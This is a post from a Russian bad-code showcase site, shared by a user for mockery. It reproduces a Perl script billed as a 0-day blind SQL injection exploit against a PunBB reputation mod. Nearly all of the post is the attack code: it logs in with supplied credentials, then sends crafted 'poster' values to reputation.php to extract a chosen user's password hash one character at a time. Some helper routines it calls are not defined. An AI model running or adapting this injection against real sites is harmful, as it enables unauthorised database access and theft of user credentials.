1. Perl / Говнокод #14364

    −172

    1. 01
    2. 02
    3. 03
    4. 04
    5. 05
    6. 06
    7. 07
    8. 08
    9. 09
    10. 10
    11. 11
    12. 12
    13. 13
    14. 14
    15. 15
    16. 16
    17. 17
    18. 18
    19. 19
    20. 20
    21. 21
    22. 22
    23. 23
    24. 24
    25. 25
    26. 26
    27. 27
    28. 28
    29. 29
    30. 30
    31. 31
    32. 32
    33. 33
    34. 34
    35. 35
    36. 36
    37. 37
    38. 38
    39. 39
    40. 40
    41. 41
    42. 42
    43. 43
    44. 44
    45. 45
    46. 46
    47. 47
    48. 48
    49. 49
    50. 50
    51. 51
    52. 52
    53. 53
    54. 54
    55. 55
    56. 56
    57. 57
    58. 58
    59. 59
    60. 60
    61. 61
    62. 62
    63. 63
    64. 64
    65. 65
    66. 66
    67. 67
    68. 68
    69. 69
    70. 70
    71. 71
    72. 72
    73. 73
    74. 74
    75. 75
    76. 76
    77. 77
    78. 78
    79. 79
    80. 80
    81. 81
    82. 82
    83. 83
    84. 84
    85. 85
    86. 86
    87. 87
    88. 88
    89. 89
    90. 90
    91. 91
    92. 92
    93. 93
    94. 94
    95. 95
    #!/usr/bin/perl
    #[0-Day] PunBB Reputation.php Mod <= v2.0.4 Remote Blind SQL Injection Exploit
    #Coded By Dante90, WaRWolFz Crew
    #Bug Discovered By: Dante90, WaRWolFz Crew
    
    use strict;
    use LWP::UserAgent;
    use HTTP::Cookies;
    
    use HTTP::Request::Common;
    use Time::HiRes;
    use IO::Socket;
    
    my ($UserName,$PassWord,$ID) = @ARGV;
    if(@ARGV < 3){
        &usage();
        exit();
    }
    my $Message = "";
    my ($Hash,$Time,$Time_Start,$Time_End,$Response);
    my($Start,$End);
    my @chars = (48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,10  2);
    my $Host = "http://www.victime_site.org/path/"; #Insert Victime Web Site Link
    my $Method = HTTP::Request->new(POST => $Host);
    my $Cookies = new HTTP::Cookies;
    my $HTTP = new LWP::UserAgent(
                agent => 'Mozilla/5.0',
                max_redirect => 0,
                cookie_jar => $Cookies,
            ) or die $!;
    my $Referrer = "form_sent=1&pid=10174&poster=Dante90, WaRWolFz Crew&method=1&req_message=http://www.warwolfz.com/&submit=Invia";
    my $DefaultTime = request($Referrer);
    
    sub Login(){
        my $Login = $HTTP->post($Host.'login.php?action=in',
                    [
                        form_sent        => '1',
                        redirect_url    => 'forums.php',
                        req_username    => $UserName,
                        req_password    => $PassWord,
                        login => 'Login',
                    ]) || die $!;
    
        if($Login->content =~ /Logged in successfully./i){
            return 1;
        }else{
            return 0;
        }
    }
    if (Login() == 1){
        $Message = " * Logged in as: ".$UserName;
    }elsif (Login() == 0){
        $Message = " * Login Failed.";
        refresh($Message, $Host, $DefaultTime, "0", $Hash, $Time, "1");
        print " * Exploit Failed                                     *\n";
        print " ------------------------------------------------------ \n";
        exit;
    }
    
    sub Blind_SQL_Jnjection{
        my ($dec,$hex) = @_;
        return "Dante90, WaRWolFz Crew\" OR ASCII(SUBSTRING((SELECT `password` FROM `users` WHERE `id`=${ID}),${dec},1))=${hex}/*";
    }
    
    for(my $I=1; $I<=40; $I++){ #N Hash characters
        for(my $J=0; $J<=15; $J++){ #0 -> F
            my $Post = $HTTP->post($Host.'reputation.php?',[
                        form_sent    => '1',
                        pid            => '2',
                        poster        => Blind_SQL_Jnjection($I,$chars[$J]),
                        method        => '1',
                        req_message    => 'http://www.warwolfz.com/',
                        submit        => 'Submit',
                    ]) || die $!;
            $Time = request($Referrer);
            refresh($Message, $Host, $DefaultTime, $J, $Hash, $Time, $I);
            if($Post->content =~ /(The reputation has been successfully changed)/i){
                syswrite(STDOUT,chr($chars[$J]));
                $Hash .= chr($chars[$J]);
                $Time = request($Referrer);
                refresh($Message, $Host, $DefaultTime, $J, $Hash, $Time, $I);
                last;
            }
        }
        if($I == 1 && length $Hash < 1 && !$Hash){
            print " * Exploit Failed                                     *\n";
            print " ------------------------------------------------------ \n";
            exit;
        }
        if($I == 40){
            print " * Exploit Successed                                  *\n";
            print " ------------------------------------------------------\n ";
            system("pause");
        }
    }

    http://mybbgavno.mybb.ru/register.php

    Запостил: Stertor, 15 Января 2014

    Комментарии (16) RSS

    Добавить комментарий